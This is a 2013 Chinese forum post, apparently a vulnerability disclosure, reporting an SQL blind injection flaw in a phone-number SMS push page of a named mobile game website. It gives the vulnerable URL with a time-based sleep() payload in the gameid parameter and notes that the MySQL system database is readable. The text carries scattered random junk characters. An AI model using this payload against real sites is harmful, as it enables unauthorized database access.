找回密码
 立即注册
查看: 2694|回复: 0
打印 上一主题 下一主题

凤凰手机游戏网SQL盲注漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:34:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:/ c$ o* R) w+ M  D8 e& `8 ~2 S5 H
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
# |5 G2 X1 i& n6 e  l  V- i8 u9 l( p3 |
详细说明:6 c, A( n4 J8 w0 B0 B
存在SQL盲注url:
  ~* n3 Q4 e" Vfenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
% m, m2 L; K' o: Uhttp://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png, O: V- L( H; K0 i8 e# c" a
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png' i! r6 p- F4 J
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg2 Z* R( s- ]- R% l! l1 i

1 K# g; L5 {1 N* ?3 t2 d! H/ W6 ~  E

能看到mysql系统数据库,看来user权限应该很高的。。

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表